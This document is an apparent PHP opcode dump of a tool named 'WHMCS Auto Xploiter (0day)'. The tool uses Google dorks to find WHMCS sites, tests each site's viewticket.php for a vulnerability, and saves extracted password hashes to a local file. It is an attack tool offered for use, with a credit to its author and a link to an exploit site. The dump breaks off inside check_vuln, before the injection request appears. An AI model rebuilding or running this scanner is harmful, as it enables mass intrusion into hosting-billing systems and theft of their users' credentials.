Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 22 Branch analysis from position: 15 1 jumps found. (Code = 42) Position 1 = 23 Branch analysis from position: 23 2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 125 Branch analysis from position: 29 1 jumps found. (Code = 42) Position 1 = 122 Branch analysis from position: 122 2 jumps found. (Code = 44) Position 1 = 124, Position 2 = 39 Branch analysis from position: 124 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 39 2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 53 Branch analysis from position: 48 1 jumps found. (Code = 42) Position 1 = 124 Branch analysis from position: 124 Branch analysis from position: 53 1 jumps found. (Code = 42) Position 1 = 118 Branch analysis from position: 118 2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55 Branch analysis from position: 121 2 jumps found. (Code = 44) Position 1 = 124, Position 2 = 39 Branch analysis from position: 124 Branch analysis from position: 39 Branch analysis from position: 55 2 jumps found. (Code = 43) Position 1 = 69, Position 2 = 103 Branch analysis from position: 69 2 jumps found. (Code = 77) Position 1 = 71, Position 2 = 81 Branch analysis from position: 71 2 jumps found. (Code = 78) Position 1 = 72, Position 2 = 81 Branch analysis from position: 72 1 jumps found. (Code = 42) Position 1 = 71 Branch analysis from position: 71 Branch analysis from position: 81 1 jumps found. (Code = 42) Position 1 = 115 Branch analysis from position: 115 2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55 Branch analysis from position: 121 Branch analysis from position: 55 Branch analysis from position: 81 Branch analysis from position: 103 2 jumps found. (Code = 44) Position 1 = 121, Position 2 = 55 Branch analysis from position: 121 Branch analysis from position: 55 Branch analysis from position: 125 Branch analysis from position: 22 2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 125 Branch analysis from position: 29 Branch analysis from position: 125 filename: /in/OQ1nP function name: (null) number of ops: 127 compiled vars: !0 = $file, !1 = $googlePage, !2 = $googleResult, !3 = $victim, !4 = $result, !5 = $alexa, !6 = $hashes, !7 = $record, !8 = $sep, !9 = $data line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 9 0 E > INIT_FCALL 'set_time_limit' 1 SEND_VAL 0 2 DO_ICALL 10 3 INIT_FCALL 'ini_set' 4 SEND_VAL 'memory_limit' 5 SEND_VAL '64M' 6 DO_ICALL 11 7 INIT_FCALL 'header' 8 SEND_VAL 'Content-Type%3A+text%2Fhtml%3B+charset%3DUTF-8' 9 DO_ICALL 75 10 ECHO '%3Chtml%3E%0A%3Chead%3E%0A%3Ctitle%3EWHMCS+Auto+Xploiter+-+by+g00n%3C%2Ftitle%3E%0A%3C%2Fhead%3E%0A%3Cbody+style%3D%22background-image%3A+url%28%27http%3A%2F%2Fi.imgur.com%2FzHNCk2e.gif%27%29%3B+background-repeat%3A+repeat%3B+background-position%3A+center%3B+background-attachment%3A+fixed%3B%22%3E%0A%0A%3CSTYLE%3E%0Atextarea%7Bbackground-color%3A%23105700%3Bcolor%3Alime%3Bfont-weight%3Abold%3Bfont-size%3A+20px%3Bfont-family%3A+Tahoma%3B+border%3A+1px+solid+%23000000%3B%7D%0Ainput%7BFONT-WEIGHT%3Anormal%3Bbackground-color%3A+%23105700%3Bfont-size%3A+15px%3Bfont-weight%3Abold%3Bcolor%3A+lime%3B+font-family%3A+Tahoma%3B+border%3A+1px+solid+%23666666%3Bheight%3A20%7D%0Abody+%7B%0Afont-family%3A+Tahoma%0A%7D%0Atr+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atd+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0A.table1+%7B%0ABORDER%3A+0px+Black%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Acolor%3A+%23FFF%3B%0A%7D%0A.td1+%7B%0ABORDER%3A+0px%3B%0ABORDER-COLOR%3A+%23333333%3B%0Afont%3A+7pt+Verdana%3B%0Acolor%3A+Green%3B%0A%7D%0A.tr1+%7B%0ABORDER%3A+0px%3B%0ABORDER-COLOR%3A+%23333333%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atable+%7B%0ABORDER%3A+dashed+1px+%23333%3B%0ABORDER-COLOR%3A+%23333333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Ainput+%7B%0Aborder++++++++++++%3A+dashed+1px%3B%0Aborder-color++++++++%3A+%23333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+8pt+Verdana%3B%0Acolor%3A+Red%3B%0A%7D%0Aselect+%7B%0ABORDER-RIGHT%3A++Black+1px+solid%3B%0ABORDER-TOP%3A++++%23DF0000+1px+solid%3B%0ABORDER-LEFT%3A+++%23DF0000+1px+solid%3B%0ABORDER-BOTTOM%3A+Black+1px+solid%3B%0ABORDER-color%3A+%23FFF%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+8pt+Verdana%3B%0Acolor%3A+Red%3B%0A%7D%0Asubmit+%7B%0ABORDER%3A++buttonhighlight+2px+outset%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Awidth%3A+30%25%3B%0Acolor%3A+%23FFF%3B%0A%7D%0Atextarea+%7B%0Aborder++++++++++++%3A+dashed+1px+%23333%3B%0ABACKGROUND-COLOR%3A+Black%3B%0Afont%3A+Fixedsys+bold%3B%0Acolor%3A+%23999%3B%0A%7D%0ABODY+%7B%0A++++SCROLLBAR-FACE-COLOR%3A+Black%3B+SCROLLBAR-HIGHLIGHT-color%3A+%23FFF%3B+SCROLLBAR-SHADOW-color%3A+%23FFF%3B+SCROLLBAR-3DLIGHT-color%3A+%23FFF%3B+SCROLLBAR-ARROW-COLOR%3A+Black%3B+SCROLLBAR-TRACK-color%3A+%23FFF%3B+SCROLLBAR-DARKSHADOW-color%3A+%23FFF%0Amargin%3A+1px%3B%0Acolor%3A+Red%3B%0Abackground-color%3A+Black%3B%0A%7D%0A.main+%7B%0Amargin++++++++++++%3A+-287px+0px+0px+-490px%3B%0ABORDER%3A+dashed+1px+%23333%3B%0ABORDER-COLOR%3A+%23333333%3B%0A%7D%0A.tt+%7B%0Abackground-color%3A+Black%3B%0A%7D%0A%0AA%3Alink+%7B%0A++++COLOR%3A+White%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Avisited+%7B%0A++++COLOR%3A+White%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Ahover+%7B%0A++++color%3A+Red%3B+TEXT-DECORATION%3A+none%0A%7D%0AA%3Aactive+%7B%0A++++color%3A+Red%3B+TEXT-DECORATION%3A+none%0A%7D%0A%0A%23result%7Bmargin%3A10px%3B%7D%0A%23result+span%7Bdisplay%3Ablock%3B%7D%0A%23result+.Y%7Bbackground-color%3Agreen%3B%7D%0A%23result+.X%7Bbackground-color%3Ared%3B%7D%0A%3C%2FSTYLE%3E%0A%3Cscript+language%3D%5C%27javascript%5C%27%3E%0Afunction+hide_div%28id%29%0A%7B%0A++document.getElementById%28id%29.style.display+%3D+%5C%27none%5C%27%3B%0A++document.cookie%3Did%2B%5C%27%3D0%3B%5C%27%3B%0A%7D%0Afunction+show_div%28id%29%0A%7B%0A++document.getElementById%28id%29.style.display+%3D+%5C%27block%5C%27%3B%0A++document.cookie%3Did%2B%5C%27%3D1%3B%5C%27%3B%0A%7D%0Afunction+change_divst%28id%29%0A%7B%0A++if+%28document.getElementById%28id%29.style.display+%3D%3D+%5C%27none%5C%27%29%0A++++show_div%28id%29%3B%0A++else%0A++++hide_div%28id%29%3B%0A%7D%0A%3C%2Fscript%3E%0A%3C%2Ftd%3E%3C%2Ftable%3E%3C%2Ftr%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3Clink+rel%3D%22stylesheet%22+type%3D%22text%2Fcss%22+href%3D%22http%3A%2F%2Ffonts.googleapis.com%2Fcss%3Ffamily%3DAudiowide%22%3E%0A++++%3Cstyle%3E%0A++++++body+%7B%0A++++++++font-family%3A+%27Audiowide%27%2C+serif%3B%0A++++++++font-size%3A+30px%3B%0A++++++++%0A++++++%7D%0A++++%3C%2Fstyle%3E%0A++%3C%2Fhead%3E%0A%0A++%3Cbody+onLoad%3D%22type_text%28%29%22+%3B+bgColor%3D%23000000+text%3D%2300FFFF+background%3D%22Fashion+fuchsia%22%3E%0A++++%3Ccenter%3E%0A%3Cfont+face%3D%22Audiowide%22+color%3D%22red%22%3EWHMCS+Auto+Xploiter+%3Cfont+color%3D%22green%22%3E%280day%29%3C%2Ffont%3E%0A%3Cbr%3E%0A%3Cfont+color%3D%22white%22+size%3D%224%22%3E%5BFor+WHMCS+ver.+%3C%3D+%3C%2Ffont%3E%3Cfont+color%3D%22green%22+size%3D%224%22%3E5.2.8%3C%2Ffont%3E%3Cfont+color%3D%22white%22+size%3D%224%22%3E%5D%3C%2Ffont%3E%0A%3C%2Ffont%3E%0A%3Cbr%3E%3Cbr%3E%0A%0A%3Ctable+border%3D1+bordercolor%3Dred%3E%0A%3Ctr%3E%0A%3Ctd+width%3D%22700%22%3E%0A%3Cbr+%2F%3E%0A%3Ccenter%3E%0A++++%3Cform+method%3D%22post%22%3E%0A++++++++Google+Dork%3A+%26nbsp%3B%26nbsp%3B%0A++++++++%3Cinput+type%3D%22text%22+id%3D%22dork%22+size%3D%2230%22+name%3D%22dork%22+value%3D%22' 226 11 FETCH_IS ~13 '_POST' 12 FETCH_DIM_IS ~14 ~13, 'dork' 13 ISSET_ISEMPTY_DIM_OBJ 0 ~14, 0 14 > JMPZ ~15, ->22 15 > INIT_FCALL 'htmlentities' 16 FETCH_R global ~16 '_POST' 17 FETCH_DIM_R ~17 ~16, 'dork' 18 SEND_VAL ~17 19 DO_ICALL $18 20 QM_ASSIGN ~19 $18 21 > JMP ->23 22 > QM_ASSIGN ~19 'inurl%3Asubmitticket.php' 23 > ECHO ~19 24 ECHO '%22+%2F%3E%0A++++++++%26nbsp%3B%26nbsp%3B%3Cinput+type%3D%22submit%22+value%3D%22Xploit%21%22+id%3D%22button%22%2F%3E%0A++++%3C%2Fform%3E%0A' 230 25 FETCH_IS ~20 '_POST' 26 FETCH_DIM_IS ~21 ~20, 'dork' 27 ISSET_ISEMPTY_DIM_OBJ 0 ~21, 0 28 > JMPZ ~22, ->125 231 29 > INIT_FCALL 'fopen' 30 SEND_VAL 'WMCS-Hashes.txt' 31 SEND_VAL 'a' 32 DO_ICALL $23 33 ASSIGN !0, $23 232 34 ECHO '%3Cbr+%2F%3E%3Cdiv+id%3D%22result%22%3E%3Cb%3EScanning+has+been+started...+Good+luck%21+%3B%29%3C%2Fb%3E%3Cbr%3E%3Cbr%3E' 233 35 INIT_FCALL 'letitby' 36 DO_FCALL 0 234 37 ASSIGN !1, 1 38 > JMP ->122 235 39 > INIT_FCALL 'google_that' 40 FETCH_R global ~27 '_POST' 41 FETCH_DIM_R ~28 ~27, 'dork' 42 SEND_VAL ~28 43 SEND_VAR !1 44 DO_FCALL 0 $29 45 ASSIGN !2, $29 236 46 BOOL_NOT ~31 !2 47 > JMPZ ~31, ->53 237 48 > ECHO 'Finished+scanning.' 238 49 INIT_FCALL 'fclose' 50 SEND_VAR !0 51 DO_ICALL 239 52 > JMP ->124 242 53 > ASSIGN !3, 0 54 > JMP ->118 243 55 > INIT_FCALL 'check_vuln' 56 FETCH_DIM_R ~34 !2, !3 57 FETCH_DIM_R ~35 ~34, 'unescapedUrl' 58 SEND_VAL ~35 59 DO_FCALL 0 $36 60 ASSIGN !4, $36 244 61 INIT_FCALL 'getalexa' 62 FETCH_DIM_R ~38 !2, !3 63 FETCH_DIM_R ~39 ~38, 'unescapedUrl' 64 SEND_VAL ~39 65 DO_FCALL 0 $40 66 ASSIGN !5, $40 245 67 IS_NOT_EQUAL !4, 'Fail%21' 68 > JMPZ ~42, ->103 246 69 > ASSIGN !6, '' 247 70 > FE_RESET_R $44 !4, ->81 71 > > FE_FETCH_R $44, !7, ->81 248 72 > INIT_FCALL 'str_replace' 73 SEND_VAL '%3A%3A%3A%3A%3A' 74 SEND_VAL '' 75 SEND_VAR !7 76 DO_ICALL $45 77 CONCAT ~46 !6, $45 78 CONCAT ~47 ~46, '%0A' 79 ASSIGN !6, ~47 247 80 > JMP ->71 81 > FE_FREE $44 250 82 ASSIGN !8, '%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%3D%0A' 251 83 FETCH_DIM_R ~50 !2, !3 84 FETCH_DIM_R ~51 ~50, 'unescapedUrl' 85 CONCAT ~52 !8, ~51 86 CONCAT ~53 ~52, '+-+Alexa%3A+' 87 CONCAT ~54 ~53, !5 88 CONCAT ~55 ~54, '%0A' 89 CONCAT ~56 ~55, !8 90 CONCAT ~57 ~56, !6 91 CONCAT ~58 ~57, '%0A' 92 ASSIGN !9, ~58 252 93 INIT_FCALL 'fwrite' 94 SEND_VAR !0 95 SEND_VAR !9 96 DO_ICALL 253 97 ECHO '%3Cbr+%2F%3E%3Cfont+color%3D%22green%22%3ESuccessfully+Xploited...%3C%2Ffont%3E' 254 98 ECHO '%3Cspan+class%3D%22Y%22%3E' 255 99 CONCAT ~61 '%3Cpre%3E', !9 100 CONCAT ~62 ~61, '%3C%2Fpre%3E%3C%2Fspan%3E%3Cbr+%2F%3E' 101 ECHO ~62 102 > JMP ->115 259 103 > ECHO '%3Cspan+class%3D%22X%22%3E' 260 104 ROPE_INIT 5 ~68 '%3Ca+href%3D%22' 105 FETCH_DIM_R ~63 !2, !3 106 FETCH_DIM_R ~64 ~63, 'unescapedUrl' 107 ROPE_ADD 1 ~68 ~68, ~64 108 ROPE_ADD 2 ~68 ~68, '%22+target%3D%27_blank%27%3E' 109 FETCH_DIM_R ~65 !2, !3 110 FETCH_DIM_R ~66 ~65, 'titleNoFormatting' 111 ROPE_ADD 3 ~68 ~68, ~66 112 ROPE_END 4 ~67 ~68, '%3C%2Fa%3E+-+%3Cfont+color%3D%22black%22%3EFailed%21%3C%2Ffont%3E' 113 ECHO ~67 261 114 ECHO '%3C%2Fspan%3E%0A%3Cbr+%2F%3E' 263 115 > INIT_FCALL 'letitby' 116 DO_FCALL 0 242 117 PRE_INC !3 118 > COUNT ~73 !2 119 IS_SMALLER !3, ~73 120 > JMPNZ ~74, ->55 234 121 > PRE_INC !1 122 > IS_SMALLER_OR_EQUAL !1, 50 123 > JMPNZ ~76, ->39 266 124 > ECHO '%3C%2Fdiv%3E' 269 125 > ECHO '%3C%2Fcenter%3E%0A%3C%2Ftd%3E%0A%3C%2Ftable%3E%0A%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%3Cfont+face%3D%22Audiowide%22+color%3D%22red%22+size%3D%222%22%3E%0ACoded+by%3A+%3Cfont+color%3D%22white%22%3Eg00n%3C%2Ffont%3E+%3Cfont+color%3D%22white%22%3E%7C%3C%2Ffont%3E+Skype%3A+%3Cfont+color%3D%22white%22%3E%3Ca+href%3D%22Skype%3At3hg00n%22%3Et3hg00n%3C%2Fa%3E%3C%2Ffont%3E%3Cbr+%2F%3E%3Cbr+%2F%3E%0A%3Cbr+%3E+%3Cfont+color%3D%22green%22%3EFor+more+tools%2Fscripts%2Fexploits%2Fetc.%3C%2Ffont%3E%0A%3Cbr+%2F%3Evisit+%3Ca+href%3D%22http%3A%2F%2Fxploiter.net%22+target%3D%22_blank%22+style%3D%22text-decoration%3A+none%3B%22%3Ewww.Xploiter.net%3C%2Fa%3E%0A%3C%2Ffont%3E%0A%0A%3C%2Fcenter%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E' 281 126 > RETURN 1 Function letitby: Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/OQ1nP function name: letItBy number of ops: 5 compiled vars: none line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 12 0 E > INIT_FCALL 'ob_flush' 1 DO_ICALL 2 INIT_FCALL 'flush' 3 DO_ICALL 4 > RETURN null End of function letitby Function getalexa: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 10, Position 2 = 16 Branch analysis from position: 10 1 jumps found. (Code = 42) Position 1 = 17 Branch analysis from position: 17 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 16 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/OQ1nP function name: getAlexa number of ops: 19 compiled vars: !0 = $url, !1 = $xml, !2 = $rank1, !3 = $rank line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 13 0 E > RECV !0 15 1 INIT_FCALL 'simplexml_load_file' 2 CONCAT ~4 'http%3A%2F%2Fdata.alexa.com%2Fdata%3Fcli%3D10%26dat%3Dsnbamz%26url%3D', !0 3 SEND_VAL ~4 4 DO_ICALL $5 5 ASSIGN !1, $5 16 6 FETCH_OBJ_R ~7 !1, 'SD' 7 FETCH_DIM_R ~8 ~7, 1 8 ASSIGN !2, ~8 17 9 > JMPZ !2, ->16 18 10 > FETCH_OBJ_R ~10 !2, 'POPULARITY' 11 INIT_METHOD_CALL ~10, 'attributes' 12 DO_FCALL 0 $11 13 FETCH_OBJ_R ~12 $11, 'TEXT' 14 ASSIGN !3, ~12 15 > JMP ->17 20 16 > ASSIGN !3, 0 21 17 > > RETURN !3 22 18* > RETURN null End of function getalexa Function google_that: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 26, Position 2 = 41 Branch analysis from position: 26 2 jumps found. (Code = 43) Position 1 = 29, Position 2 = 30 Branch analysis from position: 29 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 30 2 jumps found. (Code = 43) Position 1 = 35, Position 2 = 37 Branch analysis from position: 35 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 37 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 41 1 jumps found. (Code = 79) Position 1 = -2 filename: /in/OQ1nP function name: google_that number of ops: 44 compiled vars: !0 = $query, !1 = $page, !2 = $resultPerPage, !3 = $start, !4 = $url, !5 = $resultFromGoogle line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 24 0 E > RECV !0 1 RECV_INIT !1 1 26 2 ASSIGN !2, 8 27 3 MUL ~7 !1, !2 4 ASSIGN !3, ~7 28 5 ROPE_INIT 5 ~10 'http%3A%2F%2Fajax.googleapis.com%2Fajax%2Fservices%2Fsearch%2Fweb%3Fv%3D1.0%26hl%3Diw%26rsz%3D' 6 ROPE_ADD 1 ~10 ~10, !2 7 ROPE_ADD 2 ~10 ~10, '%26start%3D' 8 ROPE_ADD 3 ~10 ~10, !3 9 ROPE_END 4 ~9 ~10, '%26q%3D' 10 INIT_FCALL 'urlencode' 11 SEND_VAR !0 12 DO_ICALL $13 13 CONCAT ~14 ~9, $13 14 ASSIGN !4, ~14 29 15 INIT_FCALL 'json_decode' 16 INIT_FCALL_BY_NAME 'http_get' 17 SEND_VAR_EX !4 18 SEND_VAL_EX <true> 19 DO_FCALL 0 $16 20 SEND_VAR $16 21 SEND_VAL <true> 22 DO_ICALL $17 23 ASSIGN !5, $17 30 24 ISSET_ISEMPTY_DIM_OBJ 0 !5, 'responseStatus' 25 > JMPZ ~19, ->41 31 26 > FETCH_DIM_R ~20 !5, 'responseStatus' 27 IS_NOT_EQUAL ~20, '200' 28 > JMPZ ~21, ->30 29 > > RETURN <false> 32 30 > FETCH_DIM_R ~22 !5, 'responseData' 31 FETCH_DIM_R ~23 ~22, 'results' 32 COUNT ~24 ~23 33 IS_EQUAL ~24, 0 34 > JMPZ ~25, ->37 35 > > RETURN <false> 36* JMP ->40 33 37 > FETCH_DIM_R ~26 !5, 'responseData' 38 FETCH_DIM_R ~27 ~26, 'results' 39 > RETURN ~27 40* JMP ->43 36 41 > CONCAT ~28 'The+function+%3Cb%3Egoogle_that%3C%2Fb%3E+Kill+me+%3A%28+%3Cbr%3E', !4 42 > EXIT ~28 37 43* > RETURN null End of function google_that Function http_get: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 7 Branch analysis from position: 4 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 7 filename: /in/OQ1nP function name: http_get number of ops: 42 compiled vars: !0 = $url, !1 = $safemode, !2 = $im line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 39 0 E > RECV !0 1 RECV_INIT !1 <false> 40 2 TYPE_CHECK 8 !1 3 > JMPZ ~3, ->7 4 > INIT_FCALL 'sleep' 5 SEND_VAL 1 6 DO_ICALL 41 7 > INIT_FCALL_BY_NAME 'curl_init' 8 SEND_VAR_EX !0 9 DO_FCALL 0 $5 10 ASSIGN !2, $5 42 11 INIT_FCALL_BY_NAME 'curl_setopt' 12 SEND_VAR_EX !2 13 FETCH_CONSTANT ~7 'CURLOPT_RETURNTRANSFER' 14 SEND_VAL_EX ~7 15 SEND_VAL_EX 1 16 DO_FCALL 0 43 17 INIT_FCALL_BY_NAME 'curl_setopt' 18 SEND_VAR_EX !2 19 FETCH_CONSTANT ~9 'CURLOPT_CONNECTTIMEOUT' 20 SEND_VAL_EX ~9 21 SEND_VAL_EX 10 22 DO_FCALL 0 44 23 INIT_FCALL_BY_NAME 'curl_setopt' 24 SEND_VAR_EX !2 25 FETCH_CONSTANT ~11 'CURLOPT_FOLLOWLOCATION' 26 SEND_VAL_EX ~11 27 SEND_VAL_EX 1 28 DO_FCALL 0 45 29 INIT_FCALL_BY_NAME 'curl_setopt' 30 SEND_VAR_EX !2 31 FETCH_CONSTANT ~13 'CURLOPT_HEADER' 32 SEND_VAL_EX ~13 33 SEND_VAL_EX 0 34 DO_FCALL 0 46 35 INIT_FCALL_BY_NAME 'curl_exec' 36 SEND_VAR_EX !2 37 DO_FCALL 0 $15 38 > RETURN $15 47 39* INIT_FCALL_BY_NAME 'curl_close' 40* DO_FCALL 0 48 41* > RETURN null End of function http_get Function check_vuln: Finding entry points Branch analysis from position: 0 2 jumps found. (Code = 43) Position 1 = 19, Position 2 = 71 Branch analysis from position: 19 2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 69 Branch analysis from position: 66 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 69 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 71 1 jumps found. (Code = 62) Position 1 = -2 filename: /in/OQ1nP function name: check_vuln number of ops: 73 compiled vars: !0 = $url, !1 = $post, !2 = $curl_connection, !3 = $source, !4 = $infoz line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 50 0 E > RECV !0 51 1 INIT_FCALL 'dirname' 2 SEND_VAR !0 3 DO_ICALL $5 4 CONCAT ~6 $5, '%2Fviewticket.php' 5 ASSIGN
Generated using Vulcan Logic Dumper, using php 8.0.0